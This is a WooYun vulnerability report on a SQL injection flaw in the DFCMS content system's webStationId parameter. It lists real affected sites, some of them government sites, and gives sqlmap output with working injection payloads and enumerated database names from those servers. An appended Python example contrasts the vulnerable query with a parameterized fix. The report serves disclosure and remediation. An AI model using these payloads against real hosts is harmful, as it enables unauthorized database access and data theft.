
Vulnerability summary

Defect ID: wooyun-2014-087151

Vulnerability title: DFCMS system # generic SQL injection

Affected vendor: 江苏鼎峰信息技术有限公司 (Jiangsu Dingfeng Information Technology Co., Ltd.)

Author: 岩少

Submitted: 2014-12-16 12:45

Fix time: 2015-03-16 12:46

Public disclosure: 2015-03-16 12:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-12-16: Details reported to the vendor; awaiting vendor handling
2014-12-19: Vendor confirmed; details visible to the vendor only
2014-12-22: Details opened to third-party security partners
2015-02-12: Details opened to core white hats and relevant domain experts
2015-02-22: Details opened to regular white hats
2015-03-04: Details opened to intern white hats
2015-03-16: Details made public

Brief description:

As in the title (RT).

Detailed description:

Vendor: 江苏鼎峰信息技术有限公司 (Jiangsu Dingfeng Information Technology Co., Ltd.): http://www.dfcms.net/
Injectable parameter: webStationId
Example instances:
http://www.jkedu.net.cn:8080/webStationStats/webStationStats.do?method=stats&saasAppId=bdb5639f-c8ad-4b98-92fb-80cba5c7f567&webStationId=www_jkedu_net_cn
http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn
http://www.jre.net.cn/webStationStats/webStationStats.do?method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=www_jre_net_cn
http://www.dfcms.net:8080/webStationStats/webStationStats.do?method=stats&saasAppId=7defe4ae-dfb0-4901-87b7-a30ee511f456&webStationId=dj_jkxiangjhcxx_zje_net_cn
http://rztsg.com/webStationStats/webStationStats.do?method=stats&saasAppId=e8aec4c4-064d-4b4c-af9d-a6018a2cf035&webStationId=www_rztsg_com
http://www.zslxx.cn/webStationStats/webStationStats.do?method=stats&saasAppId=a42bb76e-afff-4bba-ad3c-cb23608a6d0f&webStationId=www_zslxx_cn
http://218.3.133.26/webStationStats/webStationStats.do?method=stats&saasAppId=8fd048c0-473c-410b-9641-33f08beb8a85&webStationId=fmszyey_dtjy_org
http://222.186.119.241/webStationStats/webStationStats.do?method=stats&saasAppId=1044b6f7-8a6a-4f9b-9d88-74c59c9c691f&webStationId=www_dantu_gov_cn
http://www.jszjsx.com/webStationStats/webStationStats.do?method=stats&saasAppId=d30101e0-22a1-4c3e-9f57-36a5331df10a&webStationId=c201301_jszjsx_com
1. Tested injection point: http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn

[Screenshot: 3.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: webStationId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn' AND 6189=6189 AND 'WeWR'='WeWR
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=-8397' UNION ALL SELECT 80,80,80,CHAR(113)+CHAR(103)+CHAR(111)+CHAR(115)+CHAR(113)+CHAR(89)+CHAR(85)+CHAR(76)+CHAR(118)+CHAR(104)+CHAR(119)+CHAR(112)+CHAR(84)+CHAR(85)+CHAR(103)+CHAR(113)+CHAR(103)+CHAR(103)+CHAR(102)+CHAR(113),80,80,80,80,80,80,80,80,80,80,80,80--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn' WAITFOR DELAY '0:0:5'--
---
[16:59:29] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, JSP, Tomcat 4.2.2.
back-end DBMS: Microsoft SQL Server 2005
[16:59:29] [INFO] fetching database names
[16:59:29] [INFO] the SQL query used returns 25 entries
[16:59:29] [INFO] retrieved: lumigent
[16:59:30] [INFO] retrieved: master
[16:59:30] [INFO] retrieved: model
[16:59:30] [INFO] retrieved: msdb
[16:59:30] [INFO] retrieved: saas_by
[16:59:30] [INFO] retrieved: saas_by
[16:59:30] [INFO] retrieved: saas_dantu
[16:59:30] [INFO] retrieved: saas_dtcs
[16:59:31] [INFO] retrieved: saas_dtfzb
[16:59:31] [INFO] retrieved: saas_gq
[16:59:31] [INFO] retrieved: saas_gy
[16:59:31] [INFO] retrieved: saas_gz
[16:59:31] [INFO] retrieved: saas_hrss
[16:59:31] [INFO] retrieved: saas_jsdttv
[16:59:31] [INFO] retrieved: saas_jxz
[16:59:32] [INFO] retrieved: saas_qzlx
[16:59:32] [INFO] retrieved: saas_rb
[16:59:32] [INFO] retrieved: saas_sd
[16:59:32] [INFO] retrieved: saas_sy
[16:59:32] [INFO] retrieved: saas_xc
[16:59:32] [INFO] retrieved: saas_xf
[16:59:32] [INFO] retrieved: saas_zgmfsfgy
[16:59:33] [INFO] retrieved: saas_zjjtxx
[16:59:33] [INFO] retrieved: saas_zjsgxydtz
[16:59:33] [INFO] retrieved: tempdb
available databases [24]:
[*] lumigent
[*] master
[*] model
[*] msdb
[*] saas_by
[*] saas_dantu
[*] saas_dtcs
[*] saas_dtfzb
[*] saas_gq
[*] saas_gy
[*] saas_gz
[*] saas_hrss
[*] saas_jsdttv
[*] saas_jxz
[*] saas_qzlx
[*] saas_rb
[*] saas_sd
[*] saas_sy
[*] saas_xc
[*] saas_xf
[*] saas_zgmfsfgy
[*] saas_zjjtxx
[*] saas_zjsgxydtz
[*] tempdb


2. Tested injection point: http://www.jre.net.cn/webStationStats/webStationStats.do?method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=www_jre_net_cn

[Screenshot: 4.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: webStationId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=www_jre_net_cn' AND 3929=3929 AND 'BtJU'='BtJU
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=-5741' UNION ALL SELECT 70,70,70,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(66)+CHAR(75)+CHAR(102)+CHAR(109)+CHAR(99)+CHAR(105)+CHAR(75)+CHAR(66)+CHAR(89)+CHAR(99)+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(103)+CHAR(113),70,70,70,70,70,70,70,70,70,70,70,70--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=www_jre_net_cn'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=www_jre_net_cn' WAITFOR DELAY '0:0:5'--
---
[17:01:04] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, JSP, Tomcat 4.2.2.
back-end DBMS: Microsoft SQL Server 2005
[17:01:04] [INFO] fetching database names
[17:01:05] [INFO] the SQL query used returns 41 entries
[17:01:05] [INFO] retrieved: KPM6
[17:01:05] [INFO] retrieved: master
[17:01:05] [INFO] retrieved: model
[17:01:05] [INFO] retrieved: msdb
[17:01:05] [INFO] retrieved: mssql_test
[17:01:05] [INFO] retrieved: OAWeb
[17:01:06] [INFO] retrieved: saas_baotalu
[17:01:06] [INFO] retrieved: saas_baotalu
[17:01:06] [INFO] retrieved: saas_bcxxx
[17:01:06] [INFO] retrieved: saas_chinanet
[17:01:06] [INFO] retrieved: saas_cswq
[17:01:06] [INFO] retrieved: saas_dfcms
[17:01:07] [INFO] retrieved: saas_dfoa
[17:01:07] [INFO] retrieved: saas_dtjcy
[17:01:07] [INFO] retrieved: saas_dyjtxx
[17:01:07] [INFO] retrieved: saas_jbzxxx
[17:01:07] [INFO] retrieved: saas_jkdfsxx
[17:01:07] [INFO] retrieved: SAAS_jkedu
[17:01:07] [INFO] retrieved: SAAS_jkedu
[17:01:08] [INFO] retrieved: saas_jkjys
[17:01:08] [INFO] retrieved: saas_jrjy
[17:01:08] [INFO] retrieved: saas_jrxxzxx
[17:01:08] [INFO] retrieved: saas_jsdf
[17:01:08] [INFO] retrieved: saas_jszjsxoa
[17:01:08] [INFO] retrieved: saas_jszjsxoa
[17:01:08] [INFO] retrieved: saas_lll
[17:01:09] [INFO] retrieved: saas_mfgy
[17:01:09] [INFO] retrieved: saas_nfh
[17:01:09] [INFO] retrieved: saas_njuzj
[17:01:09] [INFO] retrieved: saas_rzjys
[17:01:09] [INFO] retrieved: saas_shop
[17:01:09] [INFO] retrieved: saas_thwxx
[17:01:10] [INFO] retrieved: saas_twzx
[17:01:10] [INFO] retrieved: saas_xjhcoa
[17:01:10] [INFO] retrieved: saas_xjhcoa
[17:01:10] [INFO] retrieved: saas_zjhqxx
[17:01:10] [INFO] retrieved: saas_zjjcywx
[17:01:10] [INFO] retrieved: saas_zjjtxx
[17:01:10] [INFO] retrieved: saas_zjwsjdoa
[17:01:11] [INFO] retrieved: saas_zslxx
[17:01:11] [INFO] retrieved: tempdb
available databases [37]:
[*] KPM6
[*] master
[*] model
[*] msdb
[*] mssql_test
[*] OAWeb
[*] saas_baotalu
[*] saas_bcxxx
[*] saas_chinanet
[*] saas_cswq
[*] saas_dfcms
[*] saas_dfoa
[*] saas_dtjcy
[*] saas_dyjtxx
[*] saas_jbzxxx
[*] saas_jkdfsxx
[*] SAAS_jkedu
[*] saas_jkjys
[*] saas_jrjy
[*] saas_jrxxzxx
[*] saas_jsdf
[*] saas_jszjsxoa
[*] saas_lll
[*] saas_mfgy
[*] saas_nfh
[*] saas_njuzj
[*] saas_rzjys
[*] saas_shop
[*] saas_thwxx
[*] saas_twzx
[*] saas_xjhcoa
[*] saas_zjhqxx
[*] saas_zjjcywx
[*] saas_zjjtxx
[*] saas_zjwsjdoa
[*] saas_zslxx
[*] tempdb
[17:01:11] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\www.jre.net.cn'


Both are reproducible.

Proof of vulnerability:

[Screenshot: 3.png]


[Screenshot: 4.png]

Fix recommendation:

Filter the parameter.
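As an added illustration of the fix (not code from DFCMS or from the report's author), the defect behind the webStationId finding and its correction, in Python with an in-memory SQLite table standing in for the application's Microsoft SQL Server back end; the table and column names are assumptions, and the boolean-based payload is the one sqlmap reported above.

```python
import re
import sqlite3

# Constructed stand-in for the statistics table; the real DFCMS schema on
# SQL Server is not known, so the table and column names are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE web_station_stats (web_station_id TEXT, visits INTEGER)")
    conn.executemany("INSERT INTO web_station_stats VALUES (?, ?)",
                     [("hrss_dantu_gov_cn", 120), ("www_jre_net_cn", 45)])
    return conn

# The boolean-based blind payload sqlmap reported for webStationId (from the report above).
PAYLOAD = "hrss_dantu_gov_cn' AND 6189=6189 AND 'WeWR'='WeWR"

def stats_vulnerable(conn, web_station_id):
    """Concatenation: the request parameter becomes part of the SQL text."""
    sql = ("SELECT visits FROM web_station_stats WHERE web_station_id = '"
           + web_station_id + "'")
    return [row[0] for row in conn.execute(sql)]

def stats_parameterized(conn, web_station_id):
    """Placeholder binding: the value is data and cannot change the statement."""
    sql = "SELECT visits FROM web_station_stats WHERE web_station_id = ?"
    return [row[0] for row in conn.execute(sql, (web_station_id,))]

# Allow-list for the id format seen on this page: a host name with '.' replaced by '_'.
STATION_ID_RE = re.compile(r"[A-Za-z0-9_]{1,128}")

def is_valid_station_id(web_station_id):
    """Reject anything that is not a plain identifier (quotes, spaces, operators)."""
    return STATION_ID_RE.fullmatch(web_station_id) is not None

def stats_handler(conn, web_station_id):
    """What the fixed endpoint should do: validate first, then bind the value."""
    if not is_valid_station_id(web_station_id):
        return None  # the servlet would answer HTTP 400 here
    return stats_parameterized(conn, web_station_id)

if __name__ == "__main__":
    conn = make_db()
    print("benign id, concatenated:   ", stats_vulnerable(conn, "hrss_dantu_gov_cn"))
    print("payload, concatenated:     ", stats_vulnerable(conn, PAYLOAD))        # same row as benign
    print("payload, parameterized:    ", stats_parameterized(conn, PAYLOAD))     # no such id
    print("payload, validated handler:", stats_handler(conn, PAYLOAD))           # rejected
```

With concatenation the injected condition is evaluated by the database and the true branch returns the same row as a benign request, which is exactly the difference sqlmap's boolean-based blind test looks for; with binding and an allow-list the same string either matches nothing or never reaches the query.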

Copyright notice: when reposting, credit the source: 岩少@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2014-12-19 22:39

Vendor reply:

CNVD has confirmed and reproduced the described situation, and has notified the site's administering organisation (the software vendor) through the publicly listed contact channels (or previously established handling channels).

Latest status:

None yet